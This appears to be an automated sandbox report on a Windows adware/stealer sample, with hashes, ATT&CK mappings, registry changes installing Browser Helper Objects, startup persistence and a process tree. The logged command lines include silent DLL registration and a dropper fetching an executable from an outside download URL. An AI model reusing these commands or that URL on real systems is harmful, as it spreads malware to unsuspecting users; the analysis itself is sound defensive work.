4114100b6d9b6feed295e9a573a0ea9bb84476cf3f370f443df793cbd50a75f5

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12/10/2024, 02:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

37f3369e79cb609ff268642a90211cb0_JaffaCakes118.exe
Size

475KB
MD5

37f3369e79cb609ff268642a90211cb0
SHA1

eeed3f8c61a5daf688f784664091c3a753625742
SHA256

4114100b6d9b6feed295e9a573a0ea9bb84476cf3f370f443df793cbd50a75f5
SHA512

40d41fc352995696ebc608d4ca5b68b85015dd879d8d9f8c333ba19022588a7145fa46bb8af1821952fea62b5b91b6a60aaf68b716a318674dbeeb24f1845b1e
SSDEEP

12288:szy6rRxEvdd2hpsH3dnD/u3K6vydgzaFWVVlYZFUVFK3+:f6rTuddJNnThw4gzNVwmKu

Score

7^/10

adware discovery stealer upx

Malware Config

Signatures

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0031000000023b70-35.dat	acprotect

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	37f3369e79cb609ff268642a90211cb0_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	yes0000000000000000009.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	xxxx.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TM.lnk	yes0000000000000000009.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TM.lnk	yes0000000000000000009.exe

Executes dropped EXE 5 IoCs

pid	Process
3716	160.exe
4080	yes0000000000000000009.exe
4204	sabbc32.exe
2776	xxxx.exe
4464	frate.exe

Loads dropped DLL 2 IoCs

pid	Process
2732	Regsvr32.exe
3452	Regsvr32.exe

Installs/modifies Browser Helper Object 2 TTPs 4 IoCs

BHOs are DLL modules which act as plugins for Internet Explorer.

stealer adware

Modify Registry

T1112

Browser Extensions

T1176

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\NoExplorer = "1"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{01443AEC-0FD1-40fd-9C87-E93D1494C233}	Regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{01443AEC-0FD1-40fd-9C87-E93D1494C233}\NoExplorer = "1"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}	Regsvr32.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\sabbc32.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Thunder.dll	yes0000000000000000009.exe
File created	C:\Windows\SysWOW64\868.4808.bat	sabbc32.exe
File opened for modification	C:\Windows\SysWOW64\sabbc32.exe	cmd.exe
File created	C:\Windows\SysWOW64\sabbc32.exe	cmd.exe
File created	C:\Windows\SysWOW64\771.3129.bat	160.exe
File opened for modification	C:\Windows\SysWOW64\wybho.dll	yes0000000000000000009.exe
File created	C:\Windows\SysWOW64\sabbc32.exe	cmd.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b6d-8.dat	upx
behavioral2/memory/3716-12-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral2/memory/3716-18-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral2/files/0x000a000000023b6c-21.dat	upx
behavioral2/memory/4080-28-0x0000000000400000-0x0000000000418000-memory.dmp	upx
behavioral2/files/0x0031000000023b70-35.dat	upx
behavioral2/memory/2732-37-0x0000000010000000-0x0000000010032000-memory.dmp	upx
behavioral2/memory/4204-43-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral2/memory/4204-50-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral2/memory/4080-60-0x0000000000400000-0x0000000000418000-memory.dmp	upx
behavioral2/memory/4080-72-0x0000000000400000-0x0000000000418000-memory.dmp	upx

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Internet Explorer\yes0000000000000000009.exe	yes0000000000000000009.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	frate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	160.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yes0000000000000000009.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xxxx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sabbc32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	37f3369e79cb609ff268642a90211cb0_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Regsvr32.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3028	PING.EXE
4224	PING.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4BC48C56-7723-4FE8-8BFA-54A0A19707B3}	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{01443AEC-0FD1-40fd-9C87-E93D1494C233}	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7C849754-C410-455A-842E-75DBCBD222B6}\ = "Ixlhelper"	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7C849754-C410-455A-842E-75DBCBD222B6}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\TypeLib\ = "{A13FA9A7-4644-4233-8192-891801DC3355}"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A13FA9A7-4644-4233-8192-891801DC3355}\1.0\0	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Thunder.xlhelper\CLSID\ = "{01443AEC-0FD1-40fd-9C87-E93D1494C233}"	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{01443AEC-0FD1-40fd-9C87-E93D1494C233}\ = "xlhelper Class"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{01443AEC-0FD1-40fd-9C87-E93D1494C233}\Programmable	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{01443AEC-0FD1-40fd-9C87-E93D1494C233}\InprocServer32	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\InprocServer32\ = "C:\\Windows\\SysWow64\\wybho.dll"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4BC48C56-7723-4FE8-8BFA-54A0A19707B3}\TypeLib	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7C849754-C410-455A-842E-75DBCBD222B6}\ProxyStubClsid32	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\Programmable	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Thunder.xlhelper\ = "xlhelper Class"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Thunder.xlhelper\CurVer	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{87CA3845-37FE-414C-81CF-E08A7D0F6779}\1.0\FLAGS\ = "0"	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7C849754-C410-455A-842E-75DBCBD222B6}\TypeLib\ = "{87CA3845-37FE-414C-81CF-E08A7D0F6779}"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7C849754-C410-455A-842E-75DBCBD222B6}\TypeLib	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4BC48C56-7723-4FE8-8BFA-54A0A19707B3}\ProxyStubClsid32	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4BC48C56-7723-4FE8-8BFA-54A0A19707B3}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Thunder.xlhelper.1\ = "xlhelper Class"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{01443AEC-0FD1-40fd-9C87-E93D1494C233}\VersionIndependentProgID	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\InprocServer32	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Thunder.xlhelper.1	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Thunder.xlhelper.1\CLSID	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{01443AEC-0FD1-40fd-9C87-E93D1494C233}\ProgID\ = "Thunder.xlhelper.1"	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{01443AEC-0FD1-40fd-9C87-E93D1494C233}\InprocServer32\ThreadingModel = "Apartment"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{87CA3845-37FE-414C-81CF-E08A7D0F6779}\1.0\0\win32	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7C849754-C410-455A-842E-75DBCBD222B6}\TypeLib\ = "{87CA3845-37FE-414C-81CF-E08A7D0F6779}"	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\ProgID\ = "WYBHO.wybhotool.1"	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4BC48C56-7723-4FE8-8BFA-54A0A19707B3}\TypeLib\Version = "1.0"	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4BC48C56-7723-4FE8-8BFA-54A0A19707B3}\ = "Iwybhotool"	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A13FA9A7-4644-4233-8192-891801DC3355}\1.0\HELPDIR\ = "C:\\Windows\\system32"	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4BC48C56-7723-4FE8-8BFA-54A0A19707B3}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4BC48C56-7723-4FE8-8BFA-54A0A19707B3}\TypeLib	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{87CA3845-37FE-414C-81CF-E08A7D0F6779}\1.0\ = "Thunder 1.0 Type Library"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7C849754-C410-455A-842E-75DBCBD222B6}	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A13FA9A7-4644-4233-8192-891801DC3355}\1.0\FLAGS\ = "0"	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4BC48C56-7723-4FE8-8BFA-54A0A19707B3}\ = "Iwybhotool"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{01443AEC-0FD1-40fd-9C87-E93D1494C233}\ProgID	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{01443AEC-0FD1-40fd-9C87-E93D1494C233}\InprocServer32\ = "C:\\Windows\\SysWow64\\Thunder.dll"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{87CA3845-37FE-414C-81CF-E08A7D0F6779}\1.0\FLAGS	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A13FA9A7-4644-4233-8192-891801DC3355}	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A13FA9A7-4644-4233-8192-891801DC3355}\1.0\FLAGS	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Thunder.xlhelper\CurVer\ = "Thunder.xlhelper.1"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{87CA3845-37FE-414C-81CF-E08A7D0F6779}	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7C849754-C410-455A-842E-75DBCBD222B6}\TypeLib\Version = "1.0"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\TypeLib	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A13FA9A7-4644-4233-8192-891801DC3355}\1.0\0\win32\ = "C:\\Windows\\SysWow64\\wybho.dll"	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Thunder.xlhelper.1\CLSID\ = "{01443AEC-0FD1-40fd-9C87-E93D1494C233}"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7C849754-C410-455A-842E-75DBCBD222B6}	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7C849754-C410-455A-842E-75DBCBD222B6}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A13FA9A7-4644-4233-8192-891801DC3355}\1.0	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4BC48C56-7723-4FE8-8BFA-54A0A19707B3}	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4BC48C56-7723-4FE8-8BFA-54A0A19707B3}\TypeLib\ = "{A13FA9A7-4644-4233-8192-891801DC3355}"	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{87CA3845-37FE-414C-81CF-E08A7D0F6779}\1.0\HELPDIR\ = "C:\\Windows\\system32"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A13FA9A7-4644-4233-8192-891801DC3355}\1.0\HELPDIR	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{01443AEC-0FD1-40fd-9C87-E93D1494C233}\TypeLib	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{87CA3845-37FE-414C-81CF-E08A7D0F6779}\1.0\0\win32\ = "C:\\Windows\\SysWow64\\Thunder.dll"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Thunder.xlhelper	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\ = "wybhotool Class"	Regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\ProgID	Regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\InprocServer32\ThreadingModel = "Apartment"	Regsvr32.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
3028	PING.EXE
4224	PING.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4080	yes0000000000000000009.exe
4080	yes0000000000000000009.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3716	160.exe
4080	yes0000000000000000009.exe
4204	sabbc32.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 1636 wrote to memory of 3716	1636	37f3369e79cb609ff268642a90211cb0_JaffaCakes118.exe	86
PID 1636 wrote to memory of 3716	1636	37f3369e79cb609ff268642a90211cb0_JaffaCakes118.exe	86
PID 1636 wrote to memory of 3716	1636	37f3369e79cb609ff268642a90211cb0_JaffaCakes118.exe	86
PID 3716 wrote to memory of 2684	3716	160.exe	87
PID 3716 wrote to memory of 2684	3716	160.exe	87
PID 3716 wrote to memory of 2684	3716	160.exe	87
PID 1636 wrote to memory of 4080	1636	37f3369e79cb609ff268642a90211cb0_JaffaCakes118.exe	89
PID 1636 wrote to memory of 4080	1636	37f3369e79cb609ff268642a90211cb0_JaffaCakes118.exe	89
PID 1636 wrote to memory of 4080	1636	37f3369e79cb609ff268642a90211cb0_JaffaCakes118.exe	89
PID 2684 wrote to memory of 3028	2684	cmd.exe	90
PID 2684 wrote to memory of 3028	2684	cmd.exe	90
PID 2684 wrote to memory of 3028	2684	cmd.exe	90
PID 4080 wrote to memory of 2732	4080	yes0000000000000000009.exe	91
PID 4080 wrote to memory of 2732	4080	yes0000000000000000009.exe	91
PID 4080 wrote to memory of 2732	4080	yes0000000000000000009.exe	91
PID 2684 wrote to memory of 4204	2684	cmd.exe	92
PID 2684 wrote to memory of 4204	2684	cmd.exe	92
PID 2684 wrote to memory of 4204	2684	cmd.exe	92
PID 4204 wrote to memory of 2440	4204	sabbc32.exe	93
PID 4204 wrote to memory of 2440	4204	sabbc32.exe	93
PID 4204 wrote to memory of 2440	4204	sabbc32.exe	93
PID 2440 wrote to memory of 4224	2440	cmd.exe	95
PID 2440 wrote to memory of 4224	2440	cmd.exe	95
PID 2440 wrote to memory of 4224	2440	cmd.exe	95
PID 4080 wrote to memory of 3452	4080	yes0000000000000000009.exe	96
PID 4080 wrote to memory of 3452	4080	yes0000000000000000009.exe	96
PID 4080 wrote to memory of 3452	4080	yes0000000000000000009.exe	96
PID 4080 wrote to memory of 1404	4080	yes0000000000000000009.exe	98
PID 4080 wrote to memory of 1404	4080	yes0000000000000000009.exe	98
PID 4080 wrote to memory of 1404	4080	yes0000000000000000009.exe	98
PID 1636 wrote to memory of 2776	1636	37f3369e79cb609ff268642a90211cb0_JaffaCakes118.exe	100
PID 1636 wrote to memory of 2776	1636	37f3369e79cb609ff268642a90211cb0_JaffaCakes118.exe	100
PID 1636 wrote to memory of 2776	1636	37f3369e79cb609ff268642a90211cb0_JaffaCakes118.exe	100
PID 2776 wrote to memory of 4464	2776	xxxx.exe	101
PID 2776 wrote to memory of 4464	2776	xxxx.exe	101
PID 2776 wrote to memory of 4464	2776	xxxx.exe	101

C:\Users\Admin\AppData\Local\Temp\37f3369e79cb609ff268642a90211cb0_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\37f3369e79cb609ff268642a90211cb0_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1636
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\160.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\160.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\system32\771.3129.bat
    3⤵
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2684
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.1
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3028
  - - C:\Windows\SysWOW64\sabbc32.exe
      "C:\Windows\system32\sabbc32.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4204
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Windows\system32\868.4808.bat
        5⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2440
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.1
        6⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4224
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\yes0000000000000000009.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\yes0000000000000000009.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4080
- - C:\Windows\SysWOW64\Regsvr32.exe
    Regsvr32.exe /s "C:\Windows\system32\wybho.dll"
    3⤵
    - Loads dropped DLL
    - Installs/modifies Browser Helper Object
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:2732
- - C:\Windows\SysWOW64\Regsvr32.exe
    Regsvr32.exe /s "C:\Windows\system32\Thunder.dll"
    3⤵
    - Loads dropped DLL
    - Installs/modifies Browser Helper Object
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:3452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1404
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\xxxx.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xxxx.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\frate.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\frate.exe" "http://download.youbak.com/msn/software/partner/PARTNER2098.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Browser Extensions

T1176

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\123.bat

Filesize
250B

MD5
3d134b9cbcf8f5d6be7e835895a9a392

SHA1
07c1d70dcebdb65483c349809c0d9ea575e63491

SHA256
44330e9a25be7f771ac2ee086be9918893d373a2e9d7608d806c9394fa50dfc0

SHA512
ecef1d6a4443dde4aa89b603ab02936ae7987e469764af9a3d862d1a998be9034ae9009547cbbaa26a22284e0b3b3f7732e8eb26f6283e37dcda9b7789f17f18

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\160.exe

Filesize
28KB

MD5
fe08310c7cdbd9890b2eb57ea1c7e9f2

SHA1
4d159ca459aeefd7b259040c5b21aafd27c91f4f

SHA256
f178051780aeeaa6c9ebc92c7a28df5568d16f107953b81f667f86f9e0724c76

SHA512
4aa7b112922fbd15fe74b0a8da89bd16704cd01d428c9df993f07c6f72f96908f514cdddd8abe15a8f01b952966c457b4c08e435ba6c0722e9788c5c8ef3e944

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\xxxx.exe

Filesize
298KB

MD5
bb53dcdcf45cefcde3c80851fdd24cbf

SHA1
9cf16843fe033e70d6ac49896f6fc23a8582a09a

SHA256
1dff57e051acc686feb2d8d26bc17d1df9f3e144c004dc90abdba923ecd2b254

SHA512
b00950e140500718f0cdb59504526beb31f57861c424e2fd6c06d509ecc2f3ecab44c18437e6fdeb5b7fcfd5a32edf48a6ae3a582042b045dca1bc1737560c76

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\yes0000000000000000009.exe

Filesize
100KB

MD5
fc8dd7106d0c857885624a0f4531d803

SHA1
01f557baf126acecbe84c0dc2bc74483457cb0fe

SHA256
807999ec6288b3ddf0a1de7a983aa69609dda31d6a4e7a916ce55d8d2d8a4241

SHA512
a09da885f73c70f6022916c31c3fe656d784adb27e1f3dddbae991c3239ed16a30e2dfc772fd370f1887106ce343057befaabb7e14fc3ae87700b23931a7e50c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\frate.exe

Filesize
493KB

MD5
56f37135eb002ee4a9111dacac172082

SHA1
53caa475323ab71adb73b297b004f9fc0789d3ff

SHA256
df9173d3ecfcb3561a443ffd441e3ae05b53d8064ff9db78c6e855434f3f96fa

SHA512
9c2d9629eeaec33d08f91606891d954b22224c07005c0ce5016dc9d7b55c8988b2f114bc44b8b2ef1ba0bbb42b051954a346f1d2c1e96686a127817d268e9513

Download Submit
C:\Windows\SysWOW64\771.3129.bat

Filesize
219B

MD5
891e7ec6bbed32e8ebf0deaf0b27707e

SHA1
e92ba981dcf7357232852f513e88bd2938ca57c2

SHA256
ff601d2c2f161fef3fe12a1a3b3aea4d703e16c964a345121a6f013356aa8781

SHA512
1af0b1555758d6358e67e0ec6e8b98aec941ca01c132c8840e9c36972ddd3cc9d10c52680c52fcbb775794631aa28f1c97feeedb0013658dd198014188773fb9

Download Submit
C:\Windows\SysWOW64\868.4808.bat

Filesize
183B

MD5
7bf6ad7047b2aeaffd7f41f9c65d8966

SHA1
b2e9ea2c0583e6cd803e96358f0bdb6a61e8243d

SHA256
2e0b4f1095f620a4fca0c61d5fc8bf2c9e2fa1e59d0d2364af8b02180a322a41

SHA512
9874ab4ed5f013929c94d57d903814afc891e8a9213be85a6316d9aadf15ef13c873c72a90c4ca39357fbb8a8e6d8de7fed1e0f3c612d078d59db680685d8ccb

Download Submit
C:\Windows\SysWOW64\Thunder.dll

Filesize
32KB

MD5
b3973e099f0ea18091306c78efd8315d

SHA1
18ebb9abdacd4b8e75f397282a15c00a770f8da2

SHA256
9d489876cd46d6417200c5ff6fd188b8f93e83fd194ed567cb8c97ebca5e8736

SHA512
499b966c0f49c069b729609ec111e36bc1322eaa6b6be3049118ece0c2c0a70d0ee69e38b393f58580e619e6c74e8486f4d2779e62b29789c9f3fbd090f3c974

Download Submit
C:\Windows\SysWOW64\wybho.dll

Filesize
72KB

MD5
850e19c91833bce268abe1052f718313

